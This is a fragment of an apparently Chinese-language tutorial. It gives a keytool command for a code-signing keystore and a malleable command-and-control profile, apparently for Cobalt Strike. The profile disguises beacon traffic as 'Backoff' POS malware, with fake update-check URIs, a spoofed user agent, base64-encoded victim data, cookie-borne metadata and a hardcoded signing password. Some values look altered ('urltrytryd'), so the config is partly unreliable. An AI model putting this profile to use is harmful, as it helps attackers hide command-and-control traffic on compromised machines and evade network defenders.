keytool -genkey -alias henry -keyalg RSA -validity 36500 -keystore henry.store
-alias和-keystore后面接的参数后面也会用到
2.创建c2.profile文件
#设置样本名字
set sample_name "tryblog POS Malware";
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
#设置证书,注意以下内容得和你之前生成的证书一样
https-certificate {
set CN "test";
set O "test";
set C "test";
set L "test";
set OU "test";
set ST "test";
set validity "365";
}
#设置,修改成你的证书名称和证书密码
code-signer{
set keystore "henry.store";
set password "qq123456";
set alias "henry";
}
#指定DNS beacon不用的时候指定到IP地址
set dns_idle "8.8.4.4";
#每个单独DNS请求前强制睡眠时间
set dns_sleep "0";
#通过DNS上载数据时主机名的最大长度[0-255]
set maxdns "235";
http-post {
set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
client {
header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urltrytryd";
id {
netbios;
parameter "id";
}
output {
base64;
prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
print;
}
}
server {
output {
print;
}
}
}
http-get {
set uri "/updates";
client {
metadata {
netbiosu;
prepend "user=";
header "Cookie";
}
}
server {
header "Content-Type" "text/plain";
output {
base64;
print;
}
}
}